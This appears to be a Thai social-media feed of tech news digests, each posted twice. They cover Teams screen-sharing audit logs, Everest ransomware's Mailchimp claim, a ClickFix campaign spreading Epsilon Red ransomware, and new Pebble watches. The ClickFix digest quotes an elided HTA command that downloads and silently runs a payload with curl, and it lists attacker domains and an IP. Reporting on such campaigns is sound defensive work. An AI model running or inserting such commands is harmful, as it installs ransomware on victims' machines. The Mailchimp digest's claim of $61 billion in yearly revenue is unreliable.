    เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก
    หรือการควบคุมหน้าจอโดยไม่ได้รับอนุญาต

    การใช้งานทำผ่าน Microsoft Purview โดยเลือก Audit → New Search
    ใช้คำค้น “screenShared” หรือ “MeetingParticipantDetail”
    สามารถ export ข้อมูลเป็น CSV ได้

    ฟีเจอร์นี้เปิดให้ใช้งานแล้วสำหรับผู้ดูแลระบบทุกคน
    ไม่จำกัดเฉพาะองค์กรขนาดใหญ่
    ใช้ได้ทั้งใน Teams เวอร์ชัน desktop, web และ mobile

    Microsoft Purview เป็นแพลตฟอร์มรวมสำหรับการจัดการความปลอดภัยของข้อมูล
    รองรับการตรวจสอบ, ป้องกันการรั่วไหล, และการเข้ารหัสข้อมูล
    ใช้ร่วมกับ Microsoft 365, Edge, Windows/macOS และเครือข่าย HTTPS

    ฟีเจอร์ “Detect sensitive content during screen sharing” ช่วยแจ้งเตือนเมื่อมีข้อมูลลับปรากฏบนหน้าจอ
    เช่น หมายเลขบัตรเครดิต, เลขประจำตัวประชาชน, หรือข้อมูลภาษี
    ผู้ใช้จะได้รับแจ้งเตือนและสามารถหยุดการแชร์ได้ทันที

    Microsoft Purview รองรับการป้องกันข้อมูลด้วย sensitivity labels และ Double Key Encryption
    ช่วยให้ข้อมูลถูกเข้ารหัสและควบคุมการเข้าถึงได้ตามระดับความลับ
    เหมาะกับองค์กรที่ต้องการปฏิบัติตามข้อกำหนดด้านความปลอดภัยและกฎหมาย

    การเปิดเผยข้อมูล telemetry อาจถูกนำไปใช้ผิดวัตถุประสงค์ได้ หากไม่มีการควบคุมสิทธิ์อย่างเหมาะสม
    ผู้ดูแลระบบที่ไม่มีจรรยาบรรณอาจใช้ข้อมูลเพื่อสอดแนมหรือกดดันพนักงาน
    ควรมีการกำหนดสิทธิ์และนโยบายการเข้าถึงอย่างชัดเจน

    การแชร์หน้าจอโดยไม่ระวังอาจทำให้ข้อมูลลับรั่วไหลได้ง่าย
    เช่น การเปิดเอกสารภายในหรือข้อมูลลูกค้าระหว่างประชุมกับบุคคลภายนอก
    ควรมีการแจ้งเตือนหรือระบบตรวจจับเนื้อหาลับระหว่างการแชร์

    การใช้ฟีเจอร์นี้ต้องเปิด auditing ใน Microsoft Purview ก่อน
    หากไม่ได้เปิด auditing จะไม่สามารถดูข้อมูลย้อนหลังได้
    ข้อมูลจะถูกเก็บตั้งแต่วันที่เปิด auditing เท่านั้น

    การตรวจสอบข้อมูลย้อนหลังมีข้อจำกัดตามระดับ license ของ Microsoft 365
    ระยะเวลาการเก็บข้อมูล audit log ขึ้นอยู่กับประเภท license
    ผู้ใช้ทั่วไปอาจไม่สามารถเข้าถึงข้อมูลย้อนหลังได้ครบถ้วน

    https://www.neowin.net/news/teams-admins-will-now-be-able-to-see-telemetry-for-screen-sharing/
    🧠 เรื่องเล่าจากข่าว: “ดูว่าใครแชร์อะไร กับใคร เมื่อไหร่”—Microsoft Teams เปิดให้ตรวจสอบการแชร์หน้าจอแล้ว ในเดือนกรกฎาคม 2025 Microsoft ได้เปิดตัวฟีเจอร์ใหม่ใน Microsoft Teams ที่ให้ผู้ดูแลระบบ (Teams admins) เข้าถึงข้อมูล telemetry และ audit logs สำหรับการแชร์หน้าจอ (screen sharing) และการควบคุมหน้าจอ (Take/Give/Request control) ได้โดยตรงผ่าน Microsoft Purview ข้อมูลที่สามารถตรวจสอบได้ ได้แก่: - ใครเริ่มแชร์หน้าจอ และเมื่อไหร่ - แชร์ให้ใครดู - ใครขอควบคุมหน้าจอ และใครอนุญาต - เวลาเริ่มและหยุดการแชร์ - การยอมรับคำขอควบคุมหน้าจอ ฟีเจอร์นี้ช่วยให้ผู้ดูแลระบบสามารถตรวจสอบพฤติกรรมต้องสงสัย เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก หรือการเข้าควบคุมหน้าจอโดยไม่ได้รับอนุญาต การใช้งานทำได้ผ่าน Microsoft Purview โดยเลือกเมนู Audit → New Search แล้วกรอกคำค้น เช่น “screenShared” หรือ “MeetingParticipantDetail” เพื่อดูข้อมูลย้อนหลัง และสามารถ export เป็นไฟล์ CSV ได้ ✅ Microsoft เปิดให้ Teams admins เข้าถึง audit logs สำหรับการแชร์หน้าจอผ่าน Microsoft Purview ➡️ ตรวจสอบได้ว่าใครแชร์หน้าจอ, แชร์ให้ใคร, และเมื่อไหร่ ➡️ รองรับการตรวจสอบคำสั่ง Take, Give, Request control ✅ ข้อมูล telemetry ช่วยให้ตรวจสอบพฤติกรรมต้องสงสัยได้แบบละเอียด ➡️ เช่น การแชร์ข้อมูลลับกับบุคคลภายนอก ➡️ หรือการควบคุมหน้าจอโดยไม่ได้รับอนุญาต ✅ การใช้งานทำผ่าน Microsoft Purview โดยเลือก Audit → New Search ➡️ ใช้คำค้น “screenShared” หรือ “MeetingParticipantDetail” ➡️ สามารถ export ข้อมูลเป็น CSV ได้ ✅ ฟีเจอร์นี้เปิดให้ใช้งานแล้วสำหรับผู้ดูแลระบบทุกคน ➡️ ไม่จำกัดเฉพาะองค์กรขนาดใหญ่ ➡️ ใช้ได้ทั้งใน Teams เวอร์ชัน desktop, web และ mobile ✅ Microsoft Purview เป็นแพลตฟอร์มรวมสำหรับการจัดการความปลอดภัยของข้อมูล ➡️ รองรับการตรวจสอบ, ป้องกันการรั่วไหล, และการเข้ารหัสข้อมูล ➡️ ใช้ร่วมกับ Microsoft 365, Edge, Windows/macOS และเครือข่าย HTTPS ✅ ฟีเจอร์ “Detect sensitive content during screen sharing” ช่วยแจ้งเตือนเมื่อมีข้อมูลลับปรากฏบนหน้าจอ ➡️ เช่น หมายเลขบัตรเครดิต, เลขประจำตัวประชาชน, หรือข้อมูลภาษี ➡️ ผู้ใช้จะได้รับแจ้งเตือนและสามารถหยุดการแชร์ได้ทันที ✅ Microsoft Purview รองรับการป้องกันข้อมูลด้วย sensitivity labels และ Double Key Encryption ➡️ ช่วยให้ข้อมูลถูกเข้ารหัสและควบคุมการเข้าถึงได้ตามระดับความลับ ➡️ เหมาะกับองค์กรที่ต้องการปฏิบัติตามข้อกำหนดด้านความปลอดภัยและกฎหมาย ‼️ การเปิดเผยข้อมูล telemetry อาจถูกนำไปใช้ผิดวัตถุประสงค์ได้ หากไม่มีการควบคุมสิทธิ์อย่างเหมาะสม ⛔ ผู้ดูแลระบบที่ไม่มีจรรยาบรรณอาจใช้ข้อมูลเพื่อสอดแนมหรือกดดันพนักงาน ⛔ ควรมีการกำหนดสิทธิ์และนโยบายการเข้าถึงอย่างชัดเจน ‼️ การแชร์หน้าจอโดยไม่ระวังอาจทำให้ข้อมูลลับรั่วไหลได้ง่าย ⛔ เช่น การเปิดเอกสารภายในหรือข้อมูลลูกค้าระหว่างประชุมกับบุคคลภายนอก ⛔ ควรมีการแจ้งเตือนหรือระบบตรวจจับเนื้อหาลับระหว่างการแชร์ ‼️ การใช้ฟีเจอร์นี้ต้องเปิด auditing ใน Microsoft Purview ก่อน ⛔ หากไม่ได้เปิด auditing จะไม่สามารถดูข้อมูลย้อนหลังได้ ⛔ ข้อมูลจะถูกเก็บตั้งแต่วันที่เปิด auditing เท่านั้น ‼️ การตรวจสอบข้อมูลย้อนหลังมีข้อจำกัดตามระดับ license ของ Microsoft 365 ⛔ ระยะเวลาการเก็บข้อมูล audit log ขึ้นอยู่กับประเภท license ⛔ ผู้ใช้ทั่วไปอาจไม่สามารถเข้าถึงข้อมูลย้อนหลังได้ครบถ้วน https://www.neowin.net/news/teams-admins-will-now-be-able-to-see-telemetry-for-screen-sharing/
    WWW.NEOWIN.NET
    Teams admins will now be able to see telemetry for screen sharing
    To improve the cybersecurity posture of an organization, Microsoft is introducing audit logs for screen sharing sessions, accessible through Purview.
    0 ความคิดเห็น 0 การแบ่งปัน 124 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “Mailchimp โดนเจาะ” กับเบื้องหลังของ Everest ที่ไม่ธรรมดา

    Everest ransomware เป็นกลุ่มแฮกเกอร์ที่ใช้โมเดล “double extortion” คือเข้ารหัสไฟล์ของเหยื่อ และขโมยข้อมูลไปเผยแพร่เพื่อกดดันให้จ่ายค่าไถ่ ล่าสุดพวกเขาอ้างว่าได้เจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลที่มีผู้ใช้กว่า 14 ล้านรายทั่วโลก

    ข้อมูลที่ถูกขโมยมีขนาด 767 MB รวมกว่า 943,536 บรรทัด ซึ่งดูเหมือนจะเป็นข้อมูลจากระบบ CRM หรือการส่งออกจากฐานข้อมูลลูกค้า มากกว่าจะเป็นข้อมูลภายในของ Mailchimp เอง เช่น ชื่อบริษัท, อีเมล, เบอร์โทร, โดเมน, เทคโนโลยีที่ใช้ (Shopify, WordPress, Google Cloud ฯลฯ)

    แม้จะไม่ใช่การเจาะระบบหลัก แต่การโจมตีนี้เกิดขึ้นในช่วงที่แรนซัมแวร์กำลังระบาดหนัก—ในเวลาใกล้กัน INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree และ GLOBAL GROUP อ้างว่าเจาะ Albavisión ได้ 400 GB ส่วน Medusa ก็เรียกค่าไถ่ NASCAR ถึง $4 ล้าน

    Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 943,536 รายการ
    ขนาดไฟล์รวม 767 MB ถูกเผยแพร่บน dark web
    ข้อมูลดูเหมือนมาจากระบบ CRM ไม่ใช่ระบบภายในของ Mailchimp

    ข้อมูลที่รั่วไหลประกอบด้วยข้อมูลธุรกิจ เช่น โดเมน, อีเมล, เบอร์โทร, เทคโนโลยีที่ใช้
    มีข้อมูลเกี่ยวกับ GDPR, โซเชียลมีเดีย, และผู้ให้บริการ hosting
    จัดเรียงแบบ spreadsheet แสดงว่าอาจมาจากการส่งออกข้อมูลลูกค้า

    Everest ใช้โมเดล double extortion—เข้ารหัสไฟล์และขู่เปิดเผยข้อมูล
    เคยโจมตี Coca-Cola ในเดือนพฤษภาคม 2025 และเผยแพร่ข้อมูลพนักงาน
    ใช้ dark web leak site เป็นเครื่องมือกดดันเหยื่อ

    Mailchimp เป็นบริษัทใหญ่ที่มีผู้ใช้กว่า 14 ล้านราย และถูก Intuit ซื้อกิจการในปี 2021
    มีรายได้ปีละ $61 พันล้าน และถือครองตลาดอีเมลถึง 2 ใน 3
    การโจมตีแม้จะเล็ก แต่กระทบต่อภาพลักษณ์และความเชื่อมั่น

    ในเดือนกรกฎาคม 2025 มีการโจมตีหลายกรณีที่น่าจับตา
    INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree
    GLOBAL GROUP เจาะ Albavisión ได้ 400 GB
    Medusa เรียกค่าไถ่ NASCAR $4 ล้าน พร้อมขู่เปิดเผยข้อมูล

    https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/
    🧠 เรื่องเล่าจากข่าว: “Mailchimp โดนเจาะ” กับเบื้องหลังของ Everest ที่ไม่ธรรมดา Everest ransomware เป็นกลุ่มแฮกเกอร์ที่ใช้โมเดล “double extortion” คือเข้ารหัสไฟล์ของเหยื่อ และขโมยข้อมูลไปเผยแพร่เพื่อกดดันให้จ่ายค่าไถ่ ล่าสุดพวกเขาอ้างว่าได้เจาะระบบของ Mailchimp—แพลตฟอร์มการตลาดผ่านอีเมลที่มีผู้ใช้กว่า 14 ล้านรายทั่วโลก ข้อมูลที่ถูกขโมยมีขนาด 767 MB รวมกว่า 943,536 บรรทัด ซึ่งดูเหมือนจะเป็นข้อมูลจากระบบ CRM หรือการส่งออกจากฐานข้อมูลลูกค้า มากกว่าจะเป็นข้อมูลภายในของ Mailchimp เอง เช่น ชื่อบริษัท, อีเมล, เบอร์โทร, โดเมน, เทคโนโลยีที่ใช้ (Shopify, WordPress, Google Cloud ฯลฯ) แม้จะไม่ใช่การเจาะระบบหลัก แต่การโจมตีนี้เกิดขึ้นในช่วงที่แรนซัมแวร์กำลังระบาดหนัก—ในเวลาใกล้กัน INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree และ GLOBAL GROUP อ้างว่าเจาะ Albavisión ได้ 400 GB ส่วน Medusa ก็เรียกค่าไถ่ NASCAR ถึง $4 ล้าน ✅ Everest ransomware อ้างว่าเจาะระบบ Mailchimp และขโมยข้อมูล 943,536 รายการ ➡️ ขนาดไฟล์รวม 767 MB ถูกเผยแพร่บน dark web ➡️ ข้อมูลดูเหมือนมาจากระบบ CRM ไม่ใช่ระบบภายในของ Mailchimp ✅ ข้อมูลที่รั่วไหลประกอบด้วยข้อมูลธุรกิจ เช่น โดเมน, อีเมล, เบอร์โทร, เทคโนโลยีที่ใช้ ➡️ มีข้อมูลเกี่ยวกับ GDPR, โซเชียลมีเดีย, และผู้ให้บริการ hosting ➡️ จัดเรียงแบบ spreadsheet แสดงว่าอาจมาจากการส่งออกข้อมูลลูกค้า ✅ Everest ใช้โมเดล double extortion—เข้ารหัสไฟล์และขู่เปิดเผยข้อมูล ➡️ เคยโจมตี Coca-Cola ในเดือนพฤษภาคม 2025 และเผยแพร่ข้อมูลพนักงาน ➡️ ใช้ dark web leak site เป็นเครื่องมือกดดันเหยื่อ ✅ Mailchimp เป็นบริษัทใหญ่ที่มีผู้ใช้กว่า 14 ล้านราย และถูก Intuit ซื้อกิจการในปี 2021 ➡️ มีรายได้ปีละ $61 พันล้าน และถือครองตลาดอีเมลถึง 2 ใน 3 ➡️ การโจมตีแม้จะเล็ก แต่กระทบต่อภาพลักษณ์และความเชื่อมั่น ✅ ในเดือนกรกฎาคม 2025 มีการโจมตีหลายกรณีที่น่าจับตา ➡️ INC Ransom อ้างว่าได้ข้อมูล 1.2 TB จาก Dollar Tree ➡️ GLOBAL GROUP เจาะ Albavisión ได้ 400 GB ➡️ Medusa เรียกค่าไถ่ NASCAR $4 ล้าน พร้อมขู่เปิดเผยข้อมูล https://hackread.com/everest-ransomware-claims-mailchimp-small-breach/
    HACKREAD.COM
    Everest Ransomware Claims Mailchimp as New Victim in Relatively Small Breach
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 93 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ

    ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows

    เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ

    เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น

    Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย

    Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix”
    หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans
    หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย

    ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH)
    เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0)
    ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง

    แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้
    เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย
    ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง

    Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่
    มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง
    ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส

    โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี
    เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269
    มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี

    ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก
    ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว
    การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป

    องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง
    ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว
    Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที

    การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น
    ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch
    ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ

    ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา
    การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน
    ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย

    https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    🧠 เรื่องเล่าจากข่าว: “ClickFix” กับกับดักปลอมที่เปิดทางให้ Epsilon Red เข้าระบบคุณ ตั้งแต่เดือนกรกฎาคม 2025 แฮกเกอร์เริ่มใช้หน้าเว็บปลอมที่ดูเหมือนระบบยืนยันตัวตนจากแพลตฟอร์มดัง เช่น Discord, Twitch, Kick และ OnlyFans โดยอ้างว่าเป็น “ClickFix verification” เพื่อหลอกให้ผู้ใช้ดาวน์โหลดไฟล์ .HTA ซึ่งเป็นไฟล์ HTML ที่สามารถรันสคริปต์ได้ใน Windows เมื่อผู้ใช้คลิก “ยืนยันตัวตน” หน้าเว็บจะเปิดอีกหน้าที่แอบรันคำสั่งผ่าน ActiveXObject เช่น WScript.Shell เพื่อดาวน์โหลดไฟล์ ransomware จากเซิร์ฟเวอร์ของแฮกเกอร์ แล้วรันแบบเงียบ ๆ โดยไม่แสดงหน้าต่างใด ๆ เทคนิคนี้ต่างจากเวอร์ชันเก่าที่ใช้การคัดลอกคำสั่งไปยัง clipboard—เพราะเวอร์ชันใหม่นี้รันคำสั่งโดยตรงผ่านเบราว์เซอร์ ทำให้หลบเลี่ยงระบบป้องกันได้ง่ายขึ้น Epsilon Red ransomware จะเข้ารหัสไฟล์ทั้งหมดในเครื่อง และทิ้งข้อความเรียกค่าไถ่ที่มีสไตล์คล้าย REvil แต่มีการปรับปรุงด้านไวยากรณ์เล็กน้อย ✅ Epsilon Red ransomware ถูกแพร่ผ่านไฟล์ .HTA ที่แฝงอยู่ในหน้าเว็บปลอมชื่อ “ClickFix” ➡️ หน้าเว็บปลอมอ้างว่าเป็นระบบยืนยันตัวตนจาก Discord, Twitch, Kick, OnlyFans ➡️ หลอกให้ผู้ใช้คลิกและรันไฟล์ .HTA ที่มีสคริปต์อันตราย ✅ ไฟล์ .HTA ใช้ ActiveXObject เพื่อรันคำสั่งผ่าน Windows Script Host (WSH) ➡️ เช่น shell.Run("cmd /c curl -s -o a.exe ... && a.exe", 0) ➡️ ดาวน์โหลดไฟล์ ransomware และรันแบบเงียบโดยไม่เปิดหน้าต่าง ✅ แฮกเกอร์ใช้เทคนิค social engineering เช่นข้อความยืนยันปลอมเพื่อหลอกผู้ใช้ ➡️ เช่น “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” พร้อม typo จงใจให้ดูไม่อันตราย ➡️ ใช้คำสั่ง pause เพื่อให้หน้าต่างค้างไว้ดูเหมือนระบบจริง ✅ Epsilon Red ransomware เข้ารหัสไฟล์ทั้งหมดในเครื่องและทิ้งข้อความเรียกค่าไถ่ ➡️ มีลักษณะคล้าย REvil แต่ไม่มีความเกี่ยวข้องโดยตรง ➡️ ใช้ PowerShell scripts หลายตัวเพื่อเตรียมระบบก่อนเข้ารหัส ✅ โครงสร้างแคมเปญมีการปลอมตัวเป็นบริการยอดนิยมและใช้ IP/โดเมนเฉพาะในการโจมตี ➡️ เช่น twtich[.]cc, capchabot[.]cc และ IP 155.94.155.227:2269 ➡️ มีการใช้ Quasar RAT ร่วมด้วยในบางกรณี ‼️ ผู้ใช้ที่เปิดไฟล์ .HTA หรือใช้ Internet Explorer มีความเสี่ยงสูงมาก ⛔ ActiveX ยังเปิดใช้งานในบางระบบ Windows โดยไม่รู้ตัว ⛔ การรันคำสั่งผ่านเบราว์เซอร์สามารถหลบเลี่ยง SmartScreen และระบบป้องกันทั่วไป ‼️ องค์กรที่อนุญาตให้ใช้ปลั๊กอินเบราว์เซอร์หรือไม่จำกัดการเข้าถึงเว็บมีความเสี่ยงสูง ⛔ ผู้ใช้สามารถเข้าถึงหน้า ClickFix ปลอมและรันไฟล์ได้โดยไม่รู้ตัว ⛔ Endpoint อาจถูกเข้ารหัสและเรียกค่าไถ่ทันที ‼️ การใช้ social engineering แบบปลอมตัวเป็นบริการยอดนิยมทำให้ผู้ใช้ตกหลุมพรางง่ายขึ้น ⛔ ผู้ใช้เชื่อว่าเป็นการยืนยันตัวตนจริงจาก Discord หรือ Twitch ⛔ ไม่สงสัยว่าเป็นการโจมตีเพราะหน้าตาเว็บดูน่าเชื่อถือ ‼️ ระบบป้องกันแบบเดิมไม่สามารถตรวจจับการรันคำสั่งผ่าน ActiveX ได้ทันเวลา ⛔ การรันแบบเงียบไม่แสดงหน้าต่างหรือแจ้งเตือน ⛔ ไฟล์ถูกดาวน์โหลดและรันในหน่วยความจำโดยไม่มีร่องรอย https://hackread.com/onlyfans-discord-clickfix-pages-epsilon-red-ransomware/
    HACKREAD.COM
    OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 101 มุมมอง 0 รีวิว
  • เรื่องเล่าจากข้อมืออดีต: Pebble กลับมาแล้ว พร้อมระบบเปิดและแบตเตอรี่ 30 วัน

    หลังจากหายไปเกือบ 10 ปี Eric Migicovsky ผู้ก่อตั้ง Pebble ได้เปิดตัวบริษัทใหม่ชื่อ Core Devices และประกาศว่าเขาได้ “ซื้อคืน” เครื่องหมายการค้า Pebble เพื่อใช้กับนาฬิกาอัจฉริยะรุ่นใหม่ที่พัฒนาบนระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส

    นาฬิกาใหม่สองรุ่นคือ:
    - Pebble 2 Duo (เดิมชื่อ Core 2 Duo): หน้าจอขาวดำ e-paper ขนาด 1.26 นิ้ว, กันน้ำระดับ IPX8, มีไมค์และลำโพง, เซ็นเซอร์วัดความสูงและทิศทาง, แบตเตอรี่ใช้งานได้ 30 วัน
    - Pebble Time 2 (เดิมชื่อ Core Time 2): หน้าจอสี e-paper ขนาด 1.5 นิ้วแบบสัมผัส, ดีไซน์โลหะ, มีเซ็นเซอร์วัดหัวใจ, ไมค์และลำโพง, แบตเตอรี่ 30 วันเช่นกัน

    ทั้งสองรุ่นรองรับแอปและหน้าปัดกว่า 10,000 รายการจาก PebbleOS เดิม และสามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้ด้วยซอฟต์แวร์โอเพ่นซอร์ส

    Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025 (ล่าช้าจากกำหนดเดิมในเดือนกรกฎาคม) ส่วน Pebble Time 2 ยังอยู่ในขั้นตอนทดสอบ EVT และคาดว่าจะจัดส่งปลายปีนี้

    Pebble กลับมาอีกครั้งในปี 2025 โดยใช้ชื่อเดิมและระบบเดิม
    Eric Migicovsky ซื้อคืนเครื่องหมายการค้า Pebble
    เปิดตัวผ่านบริษัทใหม่ชื่อ Core Devices

    เปิดตัวนาฬิกาใหม่ 2 รุ่น: Pebble 2 Duo และ Pebble Time 2
    Pebble 2 Duo ราคา $149 พร้อมแบตเตอรี่ 30 วัน
    Pebble Time 2 ราคา $225 พร้อมหน้าจอสัมผัสและดีไซน์โลหะ

    ใช้ระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส
    รองรับแอปและหน้าปัดกว่า 10,000 รายการ
    ผู้ใช้สามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้เอง

    Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025
    ล่าช้าจากกำหนดเดิมเพราะทดสอบระบบกันน้ำและลำโพง
    มี Bluetooth range ประมาณ 140 เมตรในพื้นที่เปิด

    Pebble Time 2 ยังอยู่ในขั้นตอน EVT และยังไม่มีกำหนดจัดส่ง
    ปรับดีไซน์ให้บางลงและดูทันสมัยขึ้น
    เพิ่มหน้าจอสัมผัสและเซ็นเซอร์วัดหัวใจ

    สามารถสั่งจองล่วงหน้าได้ผ่านเว็บไซต์ rePebble
    มีให้เลือกสีขาวและดำ พร้อมสายขนาดมาตรฐาน 22 มม.
    สินค้าจัดส่งจากฮ่องกง—สหรัฐฯ มีค่าภาษีเพิ่ม $10 ต่อเรือน

    https://www.techradar.com/health-fitness/smartwatches/the-all-new-pebble-watches-just-got-a-new-name-and-release-date-heres-how-to-get-one
    ⌚ เรื่องเล่าจากข้อมืออดีต: Pebble กลับมาแล้ว พร้อมระบบเปิดและแบตเตอรี่ 30 วัน หลังจากหายไปเกือบ 10 ปี Eric Migicovsky ผู้ก่อตั้ง Pebble ได้เปิดตัวบริษัทใหม่ชื่อ Core Devices และประกาศว่าเขาได้ “ซื้อคืน” เครื่องหมายการค้า Pebble เพื่อใช้กับนาฬิกาอัจฉริยะรุ่นใหม่ที่พัฒนาบนระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส นาฬิกาใหม่สองรุ่นคือ: - Pebble 2 Duo (เดิมชื่อ Core 2 Duo): หน้าจอขาวดำ e-paper ขนาด 1.26 นิ้ว, กันน้ำระดับ IPX8, มีไมค์และลำโพง, เซ็นเซอร์วัดความสูงและทิศทาง, แบตเตอรี่ใช้งานได้ 30 วัน - Pebble Time 2 (เดิมชื่อ Core Time 2): หน้าจอสี e-paper ขนาด 1.5 นิ้วแบบสัมผัส, ดีไซน์โลหะ, มีเซ็นเซอร์วัดหัวใจ, ไมค์และลำโพง, แบตเตอรี่ 30 วันเช่นกัน ทั้งสองรุ่นรองรับแอปและหน้าปัดกว่า 10,000 รายการจาก PebbleOS เดิม และสามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้ด้วยซอฟต์แวร์โอเพ่นซอร์ส Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025 (ล่าช้าจากกำหนดเดิมในเดือนกรกฎาคม) ส่วน Pebble Time 2 ยังอยู่ในขั้นตอนทดสอบ EVT และคาดว่าจะจัดส่งปลายปีนี้ ✅ Pebble กลับมาอีกครั้งในปี 2025 โดยใช้ชื่อเดิมและระบบเดิม ➡️ Eric Migicovsky ซื้อคืนเครื่องหมายการค้า Pebble ➡️ เปิดตัวผ่านบริษัทใหม่ชื่อ Core Devices ✅ เปิดตัวนาฬิกาใหม่ 2 รุ่น: Pebble 2 Duo และ Pebble Time 2 ➡️ Pebble 2 Duo ราคา $149 พร้อมแบตเตอรี่ 30 วัน ➡️ Pebble Time 2 ราคา $225 พร้อมหน้าจอสัมผัสและดีไซน์โลหะ ✅ ใช้ระบบปฏิบัติการ PebbleOS แบบโอเพ่นซอร์ส ➡️ รองรับแอปและหน้าปัดกว่า 10,000 รายการ ➡️ ผู้ใช้สามารถปรับแต่งหรือพัฒนาเพิ่มเติมได้เอง ✅ Pebble 2 Duo จะเริ่มจัดส่งปลายเดือนสิงหาคม 2025 ➡️ ล่าช้าจากกำหนดเดิมเพราะทดสอบระบบกันน้ำและลำโพง ➡️ มี Bluetooth range ประมาณ 140 เมตรในพื้นที่เปิด ✅ Pebble Time 2 ยังอยู่ในขั้นตอน EVT และยังไม่มีกำหนดจัดส่ง ➡️ ปรับดีไซน์ให้บางลงและดูทันสมัยขึ้น ➡️ เพิ่มหน้าจอสัมผัสและเซ็นเซอร์วัดหัวใจ ✅ สามารถสั่งจองล่วงหน้าได้ผ่านเว็บไซต์ rePebble ➡️ มีให้เลือกสีขาวและดำ พร้อมสายขนาดมาตรฐาน 22 มม. ➡️ สินค้าจัดส่งจากฮ่องกง—สหรัฐฯ มีค่าภาษีเพิ่ม $10 ต่อเรือน 